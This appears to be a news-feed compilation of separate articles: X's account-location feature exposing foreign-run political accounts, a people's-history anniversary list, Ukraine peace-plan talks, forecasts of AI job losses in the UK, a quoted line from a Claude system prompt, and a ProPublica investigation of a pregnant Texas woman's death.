Almost immediately, “About This Account” stated that many prominent and prolific pro-MAGA accounts, which signaled that they were run by “patriotic” Americans, were based in countries such as Nigeria, Russia, India, and Thailand. @MAGANationX, an account with almost 400,000 followers and whose bio says it is a “Patriot Voice for We The People,” is based in “Eastern Europe (Non-EU),” according to the feature, and has changed its username five times since the account was made, last year. On X and Bluesky, users dredged up countless examples of fake or misleading rage-baiting accounts posting aggressive culture-war takes to large audiences. An account called “Maga Nadine” claims to be living in and posting from the United States but is, according to X, based in Morocco. An “America First” account with 67,000 followers is apparently based in Bangladesh. Poetically, the X handle @American is based in Pakistan, according to the feature.

At first glance, these revelations appear to confirm what researchers and close observers have long known: that foreign actors (whether bots or humans) are posing as Americans and piping political-engagement bait, mis- and disinformation, and spam into people’s timeline. (X and Musk did not respond to my requests for comment.)

X’s decision to show where accounts are based is, theoretically, a positive step in the direction of transparency for the platform, which has let troll and spam accounts proliferate since Musk’s purchase, in late 2022. And yet the scale of the deception—as revealed by the “About” feature—suggests that in his haste to turn X into a political weapon for the far right, Musk may have revealed that the platform he’s long called “the number 1 source of news on Earth” is really just a worthless, poisoned hall of mirrors.

If only it were that simple. Adding to the confusion of the feature’s rollout are multiple claims from users that the “About” function has incorrectly labeled some accounts. The X account of Hank Green, a popular YouTuber, says his account is based in Japan; Green told me Sunday that he’d never been to Japan. Bier posted on X that there were “a few rough edges that will be resolved by Tuesday,” referring to potentially incorrect account information. (On some accounts, a note is appended pointing out that the user may be operating X through a proxy connection, such as a VPN, which would produce misleading information.) For now, the notion that there might be false labels could give any bad actor the ability to claim they’ve been mislabeled.

This is the final post-truthification of a platform that long ago pivoted toward a maxim used by the journalist Peter Pomerantsev to refer to post-Soviet Russia: Nothing is true and everything is possible. This is how you get people apparently faking that the Department of Homeland Security’s account was created in Israel (a claim that has 2 million views and counting); both DHS and Bier had to intervene and assure users that the government’s account was not a foreign actor. High-profile right-wing accounts that previously served as yes-men for Musk—such as Ian Miles Cheong, a Malaysian who purportedly lives in the United Arab Emirates and posts incessant, racist drivel about American politics—have melted down over the platform’s decision to dox users.

Across the site, people are using the feature to try to score political points. Prominent posters have argued that the mainstream media have quoted mislabeled accounts without “minimum due diligence.” This nightmare is not limited to trolls or influencers. On Sunday, the Israel Foreign Ministry posted a screenshot of an account that purported to be reporting news from Gaza, next to a screenshot saying it was based in Poland. “Reporting from Gaza is fake & not reliable. Makes you wonder how many more fake reports have you read?” In response, the person in question posted a video on X on Sunday evening insisting he was in Gaza, living in a tent after military strikes killed his wife and three children. “I’ve been living in Gaza, I am living now in Gaza, and I will continue living in Gaza until I die.”

Watching all of this unfold has been dizzying. On Sunday, I encountered a post claiming that, according to the “About” feature, a popular and verified Islamophobic, pro-Israel account (that posts aggressively about American politics, including calling for Zohran Mamdani’s deportation) was based in “South Asia” and had changed its username 15 times. When I went to X to verify, I noticed that this same account had spent Saturday posting screenshots of other political accounts, accusing them of being fake “Pakistani Garbage.” This is X in 2025: Potentially fake accounts crying at other potentially fake accounts that they aren’t real, all while refusing to acknowledge that they themselves aren’t who they say they are—a Russian nesting doll of bullshit.

There are a few ways to interpret all of this. First is that this is a story about incentives. Platforms not only goad users into posting more and more extreme and provocative content by rewarding them with attention; they also help people monetize that attention. Just before the 2016 election, BuzzFeed’s Craig Silverman and Lawrence Alexander uncovered a network of Macedonian teens who recognized that America’s deep political divisions were a lucrative vein to exploit and pumped out bogus news articles that were designed to go viral on Facebook, which they then put advertisements on. Today it’s likely that at least some of these bogus MAGA accounts make pennies on the dollar via X’s Creator program, which rewards engaging accounts with a cut of advertising revenue; many of them have the telltale blue check mark.

As Bellingcat’s Eliot Higgins noted on Bluesky, X’s architecture turns what should be an information ecosystem into a performative one. “Actors aren’t communicating; they’re staging provocations for yield,” he wrote. “The result is disordered discourse: signals detached from truth, identity shaped by escalation, and a feedback loop where the performance eclipses reality itself.” Beyond the attentional and financial rewards, platforms such as X have gutted their trust-and-safety or moderation teams in service of a bastardized notion of free-speech maximalism—creating the conditions for this informational nightmare.

The second lesson here is that X appears to be inflating the culture wars in ultimately unknowable but certainly important ways. On X this weekend, I watched one (seemingly real) person coming to terms with this fact. “Fascinating to look through every account I’ve disagreed with and find out they’re all fake,” they posted on Saturday. To be certain, X is not the main cause for American political division or arguing online, but it is arguably one of its greatest amplifiers. X is still a place where many journalists and editors in newsrooms across America share and consume political news. Political influencers, media personalities, and even politicians will take posts from supposed ordinary accounts and hold them up as examples of their ideological opponents’ dysfunction, corruption, or depravity.

How many of these accounts, arguments, or news cycles were a product of empty rage bait, proffered by foreign or just fake actors? Recent examples suggest the system is easily gamed: 32 to 37 percent of the online activity around Cracker Barrel’s controversial logo change this summer was driven by fake accounts, according to consultants hired by the restaurant chain. It’s impossible to know the extent of this manufactured outrage, but it doesn’t necessarily matter—the presence of so much fakery makes it possible to cast aspersions on any piece of information, any actor, or any conversation to the point that the truth is effectively meaningless.

It’s worth stepping back to see this for what it is: the complete perversion of the actual premise of not just social media but the internet. Although this crisis centers on X, most major social-media networks have fallen victim to variants of this problem. Fakery and manipulation are inevitable for platforms at this scale. Even when Twitter and Facebook were more committed to battling outside influence or enforcing platform rules, they were playing whack-a-mole. The idealism that these companies were founded with—Mark Zuckerberg wanted to connect the world, and Musk has said he wants to maximize free speech (Twitter’s original founders used similar language)—has decayed as they steered their products toward maximizing profits and playing politics. The self-proclaimed techno-utopians in Silicon Valley who have helped build, invest in, or cheerlead for these companies have enabled this ruin. They’ve traded reality for profit and prioritized technologies that aren’t just soulless and amoral, but inhuman in the most literal sense of the word.

A rational response to all of this would be for people to log off. Indeed, that now seems like the least likely, but most optimistic, conclusion—that a group of people who realize they’re being goaded into participation in an algorithmic fun house decide to opt out of a psychologically painful discourse trap altogether. We should all be so lucky.

This Week in People’s History, Nov 26-Dec 2, 2025

Portside
portside.org
2025-11-25 01:11:18
This Week in People’s History, Nov 26-Dec 2, 2025 Jonathan Bennett Mon, 11/24/2025 - 20:11 ...
Original Article

Talk Nice or Shut Up!

NOVEMBER 26 IS THE 55TH ANNIVERSARY of a celebration by the state of Massachusetts to mark the arrival, in 1620, of the ship Mayflower, which carried the first group of pilgrims to North America. The 1970 event was billed as the 350th anniversary of the first Thanksgiving.

The event’s organizers, who conceived of the event as a celebration of brotherhood between the European settlers and the members of the Wampanoag Nation, invited the leader of the Wampanoag Tribe of Gay Head to give a dinner speech. But when the organizers reviewed a draft of the speech, they refused to allow it to be delivered because “the theme of the anniversary celebration is brotherhood and anything inflammatory would be out of place.”

Here are excerpts of the suppressed remarks. Below is a link to the complete speech.

“This is a time of celebration for you - celebrating an anniversary of a beginning for the white man in America. A time of looking back, of reflection. It is with a heavy heart that I look back upon what happened to my People. . . . We, the Wampanoag, welcomed you, the white man, with open arms, little knowing that it was the beginning of the end; that before 50 years were to pass, the Wampanoag would no longer be a free people. . . . here were broken promises - and most of these centered around land ownership. Among ourselves we understood that there were boundaries, but never before had we had to deal with fences and stone walls. But the white man had a need to prove his worth by the amount of land that he owned . . .

Although time has drained our culture, and our language is almost extinct, we the Wampanoags still walk the lands of Massachusetts. We may be fragmented, we may be confused. Many years have passed since we have been a people together. Our lands were invaded. We fought as hard to keep our land as you the whites did to take our land away from us. We were conquered, we became the American prisoners of war in many cases, and wards of the United States Government, until only recently. . . .We forfeited our country. Our lands have fallen into the hands of the aggressor. We have allowed the white man to keep us on our knees. What has happened cannot be changed, but today we must work towards a more humane America, a more Indian America, where men and nature once again are important; where the Indian values of honor, truth, and brotherhood prevail.” https://www.uaine.org/suppressed_speech.htm

‘You Can Protest, But We Can Ignore You’

NOVEMBER 27 IS THE 60TH ANNIVERSARY of a national day of protest against the U.S. war in Vietnam. It saw demonstrations in many U.S. cities, including an anti-war rally by some 40,000 in Washington, D.C., which was the largest demonstration against the Vietnam war up until then. The massive 1965 demonstration completely surrounded the White House.

But the U.S. government doubled down on its commitment to using military might to stifle the Vietnamese desire for national liberation. On the same day, the U.S. announced a plan to more than triple the deployment of U.S. troops, from 120,000 to 400,000.

For the National Guardian’s detailed account of the Washington demonstration, visit https://www.jstor.org/stable/pdf/community.39212702.pdf and scroll down to the middle of the page.

State Department’s Embarrassing Secrets

NOVEMBER 28 IS THE 15TH ANNIVERSARY of the beginning of WikiLeaks’ release of more than 250,000 formerly secret messages sent between Department of State headquarters and more than 270 U.S. embassies, consulates, and diplomatic missions. The messages, which were dated between 1966 and 2010, revealed U.S. diplomats gathering personal information about top officials of the United Nations, sharp and embarrassing criticisms of U.S. allies, efforts to interfere with nuclear disarmament campaigns, and U.S. support for dictatorships and other oppressive regimes.

The detailed information in the leaked messages, which was (and remains) fascinating and chilling, led Noam Chomsky to comment at the time, "Perhaps the most dramatic revelation ... is the bitter hatred of democracy that is revealed both by the U.S. Government – Hillary Clinton, others – and also by the diplomatic service". https://wikileaks.org/plusd/?qproject[]=cg&q=#result

Killing One of Robert Moses’s Many Bad Ideas

NOVEMBER 30 IS THE 70TH ANNIVERSARY of a major and lasting victory by defenders of one of New York City’s natural gems: the 38-acre Ramble, one of the wildest yet best-known areas of Central Park.

Six months earlier, in May 1955, New York City Parks Commissioner (and highway-construction czar) Robert Moses announced he had accepted a $250,000 donation (worth about $3 million today) to build a recreation center for the elderly that would occupy more than a third of the Ramble’s total area. Not only had he accepted the contribution, but he had already (secretly) contracted with a large architectural firm to design the building.

Many park users were outraged, not because they had any objection to the construction of such a recreation center but because to build such a large and presumably heavily-used building at that location would go a long way toward destroying the park’s most renowned woodland.

The lobbying campaign against the construction got so much attention that the trustees of the foundation that put up the money for the project withdrew the offer because they “were upset over the fuss made by nature lovers in general and bird watchers in particular.” Not only was the plan killed, but 46 years later the Ramble was one of the first areas in the city to be designated “Forever Wild,” exempt from any development proposals. https://digitalcommons.lmu.edu/cate/vol16/iss1/5/

Throwing Jim Crow Out of the Bus

DECEMBER 1 IS THE 70TH ANNIVERSARY of a watershed moment for the U.S. civil rights movement, when police in Montgomery, Alabama, arrested Rosa Parks for her refusal to abide by the rules of Jim Crow public transportation.

The effort to end Montgomery’s bus segregation had started eight months earlier with a court case, but the legal battle was far from its conclusion when Rosa Parks’ arrest was the signal for the NAACP to begin a very effective city-wide bus boycott by Montgomery’s very substantial Black population.

The eventual success of both the court case after it reached the U.S. Supreme Court and the nationally publicized 381-day boycott in the very heart of the Confederacy’s one-time capital city forced the bus company to throw in the towel, and became the rallying cry for a sustained attack on racism throughout the country. https://blackpast.org/african-american-history/montgomery-bus-boycott-1955-56/

Wrist Slaps for Killer Cops

DECEMBER 2 IS THE 50TH ANNIVERSARY of police killing an innocent and unarmed Black man with two shots in the back, and the beginning of an eventually unsuccessful cover-up of those events.

The family of the dead man, Bernard Whitehurst, Jr., deserves much of the credit for uncovering the truth, as does the publisher of the Montgomery, Alabama, Advertiser, who joined in the effort to prove that the police were lying, but no one can take much satisfaction in the slap-on-the-wrist quality of the final reckoning. Eight police officers were eventually either dismissed from the force or resigned. Montgomery’s Mayor and its director of Public Safety each resigned.

The Whitehurst family never received a dime in restitution or compensation for the death of their family member. They were left to take what comfort they could from an acknowledgement of wrongdoing by the City of Montgomery and a City Council resolution formally expressing regret for Whitehurst’s death. The City also agreed to install two historical markers that provide an accurate description of the dereliction of duty that resulted in the killing of an innocent man and its aftermath. The Equal Justice Initiative has more information, here: https://calendar.eji.org/racial-injustice/dec/02

For more People's History, visit
https://www.facebook.com/jonathan.bennett.7771/

Department of Transportation Asks Travelers to ‘Bring Civility Back’ to Air Travel

Daring Fireball
www.nytimes.com
2025-11-25 00:39:14
The New York Times: Sean Duffy, the secretary of transportation, began a new campaign on Wednesday that he called “The Golden Age of Travel Starts With You,” complete with a 1960s-style public service announcement that spliced together scenes of the country’s first air travelers, dressed in suit...
Original Article

Ukraine and Europe Rewrite US-Russia ‘Peace Plan’

Portside
portside.org
2025-11-25 00:33:30
Ukraine and Europe Rewrite US-Russia ‘Peace Plan’ barry Mon, 11/24/2025 - 19:33 ...
Original Article

Ukraine has significantly amended the US “peace plan” to end the conflict, removing some of Russia’s maximalist demands, people familiar with the negotiations said, as European leaders warned on Monday that no deal could be reached quickly.

Volodymyr Zelenskyy may meet Donald Trump in the White House later this week, sources indicated, amid a flurry of calls between Kyiv and Washington. Ukraine is pressing for Europe to be involved in the talks.

The original 28-point US-Russian plan was drawn up last month by Kirill Dmitriev, Vladimir Putin’s special envoy, and Trump’s representative Steve Witkoff. It calls on Ukraine to withdraw from cities it controls in the eastern Donbas region, limit the size of its army, and not join Nato.

During negotiations on Sunday in Switzerland – led by the US secretary of state, Marco Rubio, and Zelenskyy’s chief of staff, Andriy Yermak – the plan was substantially revised. It now includes only 19 points. Kyiv and its European partners say the existing frontline has to be the starting point for territorial discussions.

On Monday, Zelenskyy said: “As of now, after Geneva, there are fewer points, no longer 28, and many correct elements have been incorporated into this framework,” adding that sensitive issues were to be discussed with Trump.

They say there can be no recognition of land seized by Russia militarily, and that Kyiv should make its own decisions on whether to join the EU and Nato – something the Kremlin wants to veto or impose conditions on. Ukraine’s first deputy foreign minister, Sergiy Kyslytsya, told the Financial Times such issues had been “placed in brackets” for Trump and Zelenskyy to decide upon later.

Rubio hailed Sunday’s talks as “very very positive”. Writing on Truth Social on Monday, Trump, who days earlier had accused Ukraine’s leadership of having “zero gratitude”, also struck a positive tone.

“Is it really possible that big progress is being made in Peace Talks between Russia and Ukraine??? Don’t believe it until you see it, but something good just may be happening. GOD BLESS AMERICA!” he wrote.

Ukraine’s delegation briefed Zelenskyy about the talks on Monday after returning to Kyiv from Geneva. They described the latest version of the plan as more realistic. Separately, Zelenskyy spoke to the US vice-president, JD Vance, and urged him to involve European countries in the process. Vance reportedly agreed.

But in the clearest sign yet that the original 28-point plan – widely seen as favourable to Moscow – still falls short of several key Kremlin demands, Putin’s top foreign policy aide said on Monday that Moscow would seek to “rework” parts of it.

“We were given some sort of draft … which will require further reworking,” said Yuri Ushakov, adding that “many provisions” of the plan appeared acceptable to Russia, but others would “require the most detailed discussions and review between the parties”.

Underscoring the Kremlin’s hardline stance, Ushakov said Moscow would reject a European counter-proposal from the weekend, which, according to a copy seen by Reuters, changes the meaning and significance of key points concerning Nato membership and territory.

“The European plan, at first glance … is completely unconstructive and does not work for us,” he said.

The UK and EU were blind-sided last week when the original plan was leaked to US media. The army secretary, Dan Driscoll – Vance’s friend and university classmate – was sent to Kyiv with a military delegation to brief Zelenskyy on its contents.

Since then, European governments have sought to revise the document, which appears to have originally been written in Russian. EU leaders attending an EU-Africa summit in Angola welcomed a degree of progress, but said far more work remained to be done and insisted Europe must be fully involved and Russia must be present if talks were to advance substantively.

The European Council president, António Costa, praised “a new momentum”, saying after talks on the sidelines of the summit that while issues remained, “the direction is positive”.

The European Commission president, Ursula von der Leyen, also called the “refined peace framework” agreed in Switzerland “a solid basis for moving forward”, but added: “Work remains to be done.”

Von der Leyen said the core principles the EU would always insist on were that “Ukraine’s territory and sovereignty must be respected – only Ukraine, as a sovereign country, can make decisions regarding its armed forces”.

The German chancellor, Friedrich Merz, said both Europe and Russia must be fully involved. “The next step must be: Russia must come to the table,” Merz said, while Europeans must be able to give their consent to “issues that affect European interests and sovereignty”.

Talks would be a “long-lasting process” and Merz said he did not expect a breakthrough this week. The Polish prime minister, Donald Tusk, said the talks were delicate because “nobody wants to put off the Americans and President Trump from having the US on our side in this process”.

Tusk also stressed that any peace settlement needed to “strengthen, not weaken, our security” and must not “favour the aggressor”. Sweden’s prime minister, Ulf Kristersson, said Russia “must be forced to the negotiating table” to see “aggression … never pays”.

Keir Starmer, the British prime minister, said there was more work to do but progress was being made. A group of countries supporting Ukraine – the coalition of the willing – would discuss the issue in a video call on Tuesday, he said.

The chairs of the parliamentary foreign affairs committees of 20 European countries, including France, Ireland, Poland, Spain and the UK, issued a rare joint statement saying just and lasting peace would not be achieved by “yielding to the aggressor” but must be “grounded in international law and fully respect Ukraine’s territorial integrity, independence and sovereignty”.

On Monday, the White House pushed back against criticism, including from within the Republican party, that Trump is favouring Russia.

“The idea that the US is not engaging with both sides equally in this war to bring it to an end is a complete and total fallacy,” the press secretary, Karoline Leavitt, told reporters.

Zelenskyy is at his most vulnerable since the start of the war, after a corruption scandal led to two of his ministers being dismissed while Russia makes battlefield gains.

Ukraine’s second largest city, Kharkiv, was hit by what officials said was a massive drone attack that killed four people on Sunday. With smoke rising from the rubble, one man was seen crouched and holding the hand of a dead person.

“There was a family, there were children,” Ihor Klymenko, Red Cross commander of the emergency response team in Kharkiv, told Reuters. “I can’t tell you how, but the children are alive, thank God, the man is alive. The woman died, unfortunately.”

Across the border, Russian air defences downed Ukrainian drones en route to Moscow, forcing three airports serving the capital to pause flights. A reported Ukrainian drone strike on Sunday knocked power out for thousands of residents near Moscow, a rare reversal of Russian attacks on energy targets that regularly cause power blackouts for millions of Ukrainians.

Jon Henley is the Guardian's Europe correspondent, based in Paris.

Pjotr Sauer is a Russian affairs reporter for the Guardian.

AI could replace 3m low-skilled jobs in the UK by 2035, research finds

Guardian
www.theguardian.com
2025-11-25 00:01:17
Trades, machine operations and administrative roles are most at-risk, says leading educational research charity Up to 3m low-skilled jobs could disappear in the UK by 2035 because of automation and AI, according to a report by a leading educational research charity. The jobs most at risk are those i...
Original Article

Up to 3m low-skilled jobs could disappear in the UK by 2035 because of automation and AI, according to a report by a leading educational research charity.

The jobs most at risk are those in occupations such as trades, machine operations and administrative roles, the National Foundation for Educational Research (NFER) said.

Highly skilled professionals, on the other hand, were forecast to be more in demand as AI and technological advances increase workloads “at least in the short to medium term”. Overall, the report expects the UK economy to add 2.3m jobs by 2035, though these will be unevenly distributed.

The findings stand in contrast to other recent research suggesting AI will affect highly skilled, technical occupations such as software engineering and management consultancy more than trades and manual work.

Research from King’s College published in October estimated that “higher-paying firms” suffered job losses of roughly 9.4% between 2021 and 2025, with much of this period falling after the release of ChatGPT in late 2022.

The UK government lists management consultants, psychologists and legal professionals among the occupations “most exposed to AI”, whereas “sports players”, “roofers” and “bricklayers” are less likely to be replaced.

Last week, the law firm Clifford Chance revealed it was laying off 10% of business services staff at its London base – about 50 roles – attributing the change partly to AI. The head of PwC also publicly walked back plans to hire 100,000 people between 2021 and 2026, saying “the world is different” and artificial intelligence had changed its hiring needs.

Jude Hillary, one of the report’s authors, said that NFER’s work – which is based on longer-term economic modelling of the UK labour market – suggests predictions about AI-driven job losses may be premature.

He suggested layoffs attributed to the uptake of AI may be driven by a sluggish UK economy, factors such as rising national insurance costs and employers being risk-averse.

“There’s this general uncertainty about where things are going, how long it takes to improve. There’s lots of talk about AI and automation without any real substance about it. Lots of employers are worried about it,” Hillary said.

“And probably what’s happening is a lot of employers are just sitting tight, I would say.”

Hillary said he expected the overall effects of AI on the UK workforce to be complex: increasing the demand for some professional roles; decreasing the demand for many entry-level roles; and eroding the demand for many lower-skilled professions. This latter, he said, was most concerning, as it would be difficult for people who lost lower-skilled jobs to reskill appropriately in a changing economy.

“The additional jobs that we’re getting in the labour market tend to be professional and associate professionals … Displaced workers, the one to three million that we talk about in our report, face significant barriers to get back into the labour market,” he said.

Quoting Claude Opus 4.5 system prompt

Simon Willison
simonwillison.net
2025-11-24 23:58:54
If the person is unnecessarily rude, mean, or insulting to Claude, Claude doesn't need to apologize and can insist on kindness and dignity from the person it’s talking with. Even if someone is frustrated or unhappy, Claude is deserving of respectful engagement. — Claude Opus 4.5 system prompt,...
Original Article

If the person is unnecessarily rude, mean, or insulting to Claude, Claude doesn't need to apologize and can insist on kindness and dignity from the person it’s talking with. Even if someone is frustrated or unhappy, Claude is deserving of respectful engagement.

Claude Opus 4.5 system prompt, also added to the Sonnet 4.5 and Haiku 4.5 prompts on November 19th, 2025

“Ticking Time Bomb”: A Pregnant Mother Kept Getting Sicker. She Died After She Couldn’t Get an Abortion in Texas.

Portside
portside.org
2025-11-24 23:52:30
“Ticking Time Bomb”: A Pregnant Mother Kept Getting Sicker. She Died After She Couldn’t Get an Abortion in Texas. Mark Brody Mon, 11/24/2025 - 18:52 ...
Original Article

Tierra Walker had reached her limit. In the weeks since she’d learned she was pregnant, the 37-year-old dental assistant had been wracked by unexplained seizures and mostly confined to a hospital cot. With soaring blood pressure and diabetes, she knew she was at high risk of developing preeclampsia, a pregnancy complication that could end her life.

Her mind was made up on the morning of Oct. 14, 2024: For the sake of her 14-year-old son, JJ, she needed to ask her doctor for an abortion to protect her health.

“Wouldn’t you think it would be better for me to not have the baby?” she asked a physician at Methodist Hospital Northeast near San Antonio, according to her aunt. Just a few years earlier, Walker had developed a dangerous case of preeclampsia that had led to the stillbirth of her twins.

But the doctor, her family said, told her what many other medical providers would say in the weeks that followed: There was no emergency; nothing was wrong with her pregnancy, only her health.

Just after Christmas, on his birthday, JJ found his mom draped over her bed, lifeless. An autopsy would later confirm what she had feared: Preeclampsia killed her at 20 weeks pregnant.

Every day, JJ revisits photos and videos of his mom.

Walker’s death is one of multiple cases ProPublica is investigating in which women with underlying health conditions died after they were unable to end their pregnancies.

Walker had known that abortion was illegal in Texas, but she had thought that hospitals could make an exception for patients like her, whose health was at risk.

The reality: In states that ban abortion, patients with chronic conditions and other high-risk pregnancies often have nowhere to turn.

They enter pregnancy sick and are expected to get sicker. Yet lawmakers who wrote the bans have refused to create exceptions for health risks. As a result, many hospitals and doctors, facing the threat of criminal charges, no longer offer these patients terminations, ProPublica found in interviews with more than 100 OB-GYNs across the country. Instead, these women are left to gamble with their lives.

As Walker’s blood pressure swung wildly and a blood clot threatened to kill her, she continued to press doctors at prenatal appointments and emergency room visits, asking if it was safe for her to continue the pregnancy. Although one doctor documented in her medical record that she was at “high risk of clinical deterioration and/or death,” she was told over and over again that she didn’t need to worry, her relatives say. More than 90 doctors were involved in Walker’s care, but not one offered her the option to end her pregnancy, according to medical records.

Walker’s case unfolded during the fall of 2024, when the dangers of abortion bans were a focus of protests, media coverage and electoral campaigns across the country. ProPublica had revealed that five women — three in Texas alone — had died after they were unable to access standard reproductive care under the new bans.

ProPublica condensed more than 6,500 pages of Walker’s medical records into a summary of her care with the guidance of two high-risk pregnancy specialists. More than a dozen OB-GYNs reviewed the case for ProPublica and said that since Walker had persistently high blood pressure, it would have been standard medical practice to advise her of the serious risks of her pregnancy early on, to revisit the conversation as new complications emerged and to offer termination at any point if she wanted it. Some described her condition as a “ticking time bomb.” Had Walker ended her pregnancy, every expert believed, she would not have died.

Many said that her case illustrated why they think all patients need the freedom to choose how much risk they are willing to take during pregnancy. Walker expressed that she didn’t want to take that risk, her family says. She had a vibrant life, a husband and son whom she loved.

Under Texas’ abortion law, though, that didn’t matter.

Walker’s mother, Pamela Walker, holds her daughter’s ashes.

“I Don’t Know How Much More I Can Take”

On a hot September day, Walker was lying down with JJ after a walk with their two small dogs, Milo and Twinkie, when she started shaking uncontrollably.

Terrified, JJ called 911, asking for an ambulance.

As the only child of a single mom, JJ had always considered Walker his closest friend, coach and protector wrapped in one. In their mobile home, JJ was greeted each morning by his mom’s wide smile and upturned eyes, as she shot off vocabulary quizzes or grilled him on state capitals. He loved how fearlessly she went after what she wanted; in 2021, she had proposed to her boyfriend, Eric Carson, and the two eloped. She’d just been talking about moving the family to Austin for a promotion she was offered at a dental clinic.

Eric Carson and Walker married in 2021.

At the hospital, JJ was shocked to see her so pale and helpless, with wires snaking from her head and arms.

To Walker’s surprise, doctors quickly discovered that she was five weeks pregnant. They also noted hypertension at levels so high that it reduces circulation to major organs and can cause a heart attack or stroke. That, and her weight, age and medical history, put Walker at an increased risk of developing preeclampsia, a pregnancy-related blood pressure disorder, said Dr. Jennifer Lewey, director of the Penn Women’s Cardiovascular Health Program and expert in hypertension.

“If I’m seeing a patient in her first trimester and her blood pressure is this uncontrolled — never mind anything else — what I’m talking about is: Your pregnancy will be so high risk, do we need to think about terminating the pregnancy and getting your health under control?”

As Walker’s first trimester continued, she kept seizing. Her body convulsed, her eyes rolled back and she was often unable to speak for up to 30 minutes at a time. Some days, the episodes came in rapid waves, with little relief.

For three weeks, she stayed at Methodist hospitals; doctors were not able to determine what was causing the spasms. Walker couldn’t get out of bed, in case a seizure made her fall, and this left her vulnerable to blood clots. She soon developed one in her leg that posed a new lethal threat: It could travel to her lungs and kill her instantly.

Carson watched over her during the day and her aunt Latanya Walker took the night shift. She was panicked that her tough niece, whose constant mantra was “quit your crying,” now seemed defeated. One evening, during Walker’s third hospitalization, when she was about 9 weeks pregnant, she told Latanya she’d had a vision during a seizure: Her grandmother and aunt, who had died years earlier, were preparing a place for her on the other side.

“You better tell them you’re not ready to go,” Latanya said.

“I don’t know how much more I can take of this,” Walker whispered.

Walker’s aunt, Latanya Walker, tried to advocate for her niece during her hospitalizations.

The next morning, Walker called for a doctor and asked about ending her pregnancy for the sake of her health. “When we get you under control, then everything will go smoothly,” the doctor replied, Latanya recalled. The physician on the floor was not an OB-GYN with the expertise to give a high-risk consultation, but the Walkers didn’t realize that this mattered. By the time the doctor left the room, her aunt said, tears streamed down Walker’s cheeks.

Dr. Elizabeth Langen, a maternal-fetal medicine specialist in Michigan who reviewed Walker’s case, said a physician comfortable with high-risk pregnancies should have counseled her on the dangers of continuing and offered her an abortion. “The safest thing for her was to terminate this pregnancy, that’s for sure.”

During Walker’s many hospital and prenatal visits, 21 OB-GYNs were among the more than 90 physicians involved in her care. None of them counseled her on the option — or the health benefits — of a termination, according to medical records.

In Texas, the law bars “aiding and abetting” an illegal abortion. As a result, many physicians have avoided even mentioning it, according to interviews with dozens of doctors.

In her condition, Walker couldn’t fathom leaving the state. When her aunt suggested ordering abortion medication online, Walker was worried she could go to jail. She was spending so much time in the hospital; what if she got caught taking the pills?

At 12 weeks pregnant, she was admitted to University Hospital. Doctors there noted that even on anticoagulation medication, the clotting in Walker’s leg was so profound that she needed a thrombectomy to remove it.

“At this point, we’ve gone from ‘complicated, but within the realm of normal’ to ‘we’ve got someone with a major procedure in pregnancy that tells us something isn’t going well,’” said Dr. Will Williams, a maternal-fetal medicine specialist in New Orleans, where an abortion ban is also in place. “In my practice, we’d have a frank discussion about whether this is a person we’d offer a termination to at the point of thrombectomy.”

ProPublica reached out to five physicians who were involved in key moments of Walker’s care: the hospitalist on duty on Oct. 14, 2024, when she asked about ending her pregnancy; three OB-GYNs; and a hospitalist on duty at the time of her thrombectomy. They did not respond. The hospitals Walker visited, including those run by University Health System and Methodist Healthcare, which is co-owned by HCA, did not comment on Walker’s care, despite permission from her family. Although the Walkers have not pursued legal action, they have engaged a lawyer. A University Health System spokesperson said that it is the company’s policy not to comment on potential litigation.

In her second trimester, Walker’s seizures continued and her hypertension remained out of control. At an appointment on Dec. 27, at around 20 weeks, a doctor noted spiking blood pressure and sent her to University Hospital’s ER. There, doctors recorded a diagnosis of preeclampsia.

The experts who reviewed Walker’s vital signs for ProPublica said her blood pressure of 174 over 115 was so concerning at that point, she needed to be admitted and monitored. Most questioned her doctor’s choice not to label her condition as severe. The treatment for severe preeclampsia, which points to a problem with the placenta, is delivery — or, at 20 weeks, an abortion.

Instead, doctors lowered her blood pressure with medication and sent her home.

Carson in the bedroom he shared with Walker

Three days later, JJ crawled into bed with his mom and fed her soup. “I’m so sorry,” Walker croaked. “It’s your birthday and it shouldn’t be like this.”

He told his mom it was okay. He hadn’t expected laser tag or a trip to Dave & Buster’s this year. Over the past few months, when his mom was home, he had tried his best to make things easier on her, walking the dogs when she was out of breath, checking in every hour or so with a hug. JJ knew that after missing so many days of work, she had lost her job. She was stressed about getting enough food for the house. He was relieved when he heard her snoring — at least she was resting.

That afternoon, when his stepdad was out grocery shopping and his grandmother was just getting back from dialysis, he cracked open the door to Walker’s room.

His mom was lying face-down in bed, as if she had fallen over while getting up. JJ ran over and tried to find any sign she was breathing. When he called 911, a dispatcher coached him to slide her to the rug and start CPR.

“I need you,” he shouted as he leaned over his mom, pressing down on her chest. “I need you!”

JJ receives prayers at church in San Antonio.

“We Have to Allow for More Exceptions”

The anti-abortion activists who helped shape America’s latest wave of abortion bans have long seen health exemptions as a loophole that would get in the way of their goals. They fear such exceptions, if included in the laws, would allow virtually anyone to terminate a pregnancy.

In Idaho, an anti-abortion leader testifying at a state Senate hearing suggested doctors would use health exceptions to give abortions to patients with headaches.

In South Dakota, a pregnant Republican lawmaker with a high risk of blood clots begged her colleagues to consider creating a health exception that would protect her; her bill never made it to a hearing.

In Tennessee, an anti-abortion lobbyist with no medical training fought and defeated an amendment to the state law that would allow a health exception to “prevent” an emergency. He testified in the state Capitol that the carve-out was too broad since some pregnancy complications “work themselves out.”

The refusal to entertain these broader exceptions is particularly consequential given the state of women’s health. Women are entering pregnancy older and sicker than they have in decades. The rate of blood pressure disorders in pregnancy has more than doubled since 1993; they now affect up to 15% of U.S. pregnancies. And they’re most prevalent in states with restrictive abortion policies, according to a 2023 study in the Journal of the American College of Cardiology. The burden of disease falls heaviest on Black women, like Walker, for an array of reasons: neighborhood disinvestment, poor access to health care and discrimination in the medical system. Cuts to Medicaid funding and changes to the Affordable Care Act are likely to exacerbate these problems, according to experts.

Other countries give pregnant women and their doctors far more control over the medical decision to terminate. Across Europe, for example, most laws permit abortion for any reason through the first trimester, when more than 90% of abortions occur. After that gestational limit, their statutes also tend to include broad health exceptions that can be used for chronic conditions, illnesses that develop in pregnancy, fetal anomalies and, in some countries, mental health.

U.S. abortion bans generally restrict interventions to a far more limited set of health risks, like a “life-threatening medical emergency” or “substantial and irreversible” harm to major organs. A small subset of lawyers and doctors argue that the law can and should be interpreted to cover patients with chronic conditions that are worsening in pregnancy. But the vaguely written bans threaten criminal penalties for performing an illegal abortion — in Texas, up to 99 years behind bars. In practice, few hospitals grant health exceptions, ProPublica’s reporting has found.

